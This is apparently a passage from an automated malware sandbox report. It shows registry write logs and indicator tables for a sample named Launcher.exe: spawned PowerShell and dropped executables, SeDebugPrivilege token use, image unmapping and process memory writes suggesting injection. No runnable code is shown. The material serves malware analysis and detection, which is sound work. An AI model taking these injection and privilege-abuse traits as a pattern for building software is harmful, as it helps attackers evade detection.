d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4- = f0e9bcf5f3c6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003688b7f5f3c6da013688b7f5f3c6da013688b7f5f3c6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000646466356536323334326138306436663631313739386433623938633662383463623862373836386236313532353733363436393764623130663337356430390000b20009000400efbed958985cd958985c2e00000000000000000000000000000000000000000000000000cabf0801640064006600350065003600320033003400320061003800300064003600660036003100310037003900380064003300620039003800630036006200380034006300620038006200370038003600380062003600310035003200350037003300360034003600390037006400620031003000660033003700350064003000390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64646635653632333432613830643666363131373938643362393863366238346362386237383638623631353235373336343639376462313066333735643039000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c78ebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c78ebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = ffd296f6f3c6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ca87051c8934ddd59546e2cc6aa9ea4b6712e3f6b6b826d5b1cbaebde0e55f83"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87044529-e6b1-49fc-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3410648e-49c6-4ecd-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019- = de06b1f5f3c6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = d8c574f6f3c6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cb6a01a3d869126997a59aec3c7720e72b03f778da1ad633797e986f09cab9d"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cb6a01a3d869126997a59aec3c7720e72b03f778da1ad633797e986f09cab9d"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a5829ef5f3c6da01a5829ef5f3c6da01a5829ef5f3c6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbed958985cd958985c2e000000000000000000000000000000000000000000000000005bc52101330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c75ebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c75ebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ddf5e62342a80d6f611798d3b98c6b84cb8b7868b615257364697db10f375d09"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87044529-e6b1-49fc- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ca87051c8934ddd59546e2cc6aa9ea4b6712e3f6b6b826d5b1cbaebde0e55f83"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b1c3af0-c6f0-4bff-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ddf5e62342a80d6f611798d3b98c6b84cb8b7868b615257364697db10f375d09"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008a7fb2f5f3c6da018a7fb2f5f3c6da018a7fb2f5f3c6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000636138373035316338393334646464353935343665326363366161396561346236373132653366366236623832366435623163626165626465306535356638330000b20009000400efbed958985cd958985c2e0000000000000000000000000000000000000000000000000076c80d01630061003800370030003500310063003800390033003400640064006400350039003500340036006500320063006300360061006100390065006100340062003600370031003200650033006600360062003600620038003200360064003500620031006300620061006500620064006500300065003500350066003800330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63613837303531633839333464646435393534366532636336616139656134623637313265336636623662383236643562316362616562646530653535663833000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c77ebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c77ebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006c17edf5f3c6da01e29d55f6f3c6da01e29d55f6f3c6da01ad1e08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000646466356536323334326138306436663631313739386433623938633662383463623862373836386236313532353733363436393764623130663337356430390000b20009000400efbed958985cd958985c2e00000000000000000000000000000000000000000000000000cabf0801640064006600350065003600320033003400320061003800300064003600660036003100310037003900380064003300620039003800630036006200380034006300620038006200370038003600380062003600310035003200350037003300360034003600390037006400620031003000660033003700350064003000390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64646635653632333432613830643666363131373938643362393863366238346362386237383638623631353235373336343639376462313066333735643039000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c7bebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c7bebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00ac8800-72bc-46d6-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf- = 993aa1f5f3c6da01	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeaxfu4rpx.rry0.exeopenwith.exeaxfu4rpx.rry1.exepowershell.exedialer.exe

pid	process
1732	powershell.exe
1732	powershell.exe
4936	powershell.exe
4936	powershell.exe
3984	axfu4rpx.rry0.exe
3984	axfu4rpx.rry0.exe
464	openwith.exe
464	openwith.exe
464	openwith.exe
464	openwith.exe
4872	axfu4rpx.rry1.exe
3716	powershell.exe
3716	powershell.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
4872	axfu4rpx.rry1.exe
1016	dialer.exe
1016	dialer.exe
4872	axfu4rpx.rry1.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe
1016	dialer.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exeaxfu4rpx.rry1.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	4872	axfu4rpx.rry1.exe
Token: SeDebugPrivilege	1016	dialer.exe
Token: SeShutdownPrivilege	3112	powercfg.exe
Token: SeCreatePagefilePrivilege	3112	powercfg.exe
Token: SeShutdownPrivilege	1732	powercfg.exe
Token: SeCreatePagefilePrivilege	1732	powercfg.exe
Token: SeShutdownPrivilege	4008	powercfg.exe
Token: SeCreatePagefilePrivilege	4008	powercfg.exe
Token: SeShutdownPrivilege	3948	powercfg.exe
Token: SeCreatePagefilePrivilege	3948	powercfg.exe
Token: SeShutdownPrivilege	380	dwm.exe
Token: SeCreatePagefilePrivilege	380	dwm.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

3924 RuntimeBroker.exe
3420 Explorer.EXE

pid	process
3924	RuntimeBroker.exe
3420	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exepowershell.exeaxfu4rpx.rry2.execmd.exeaxfu4rpx.rry0.execmd.exeaxfu4rpx.rry1.exedialer.exe

description	pid	process	target process
PID 1008 wrote to memory of 1732	1008	Launcher.exe	powershell.exe
PID 1008 wrote to memory of 1732	1008	Launcher.exe	powershell.exe
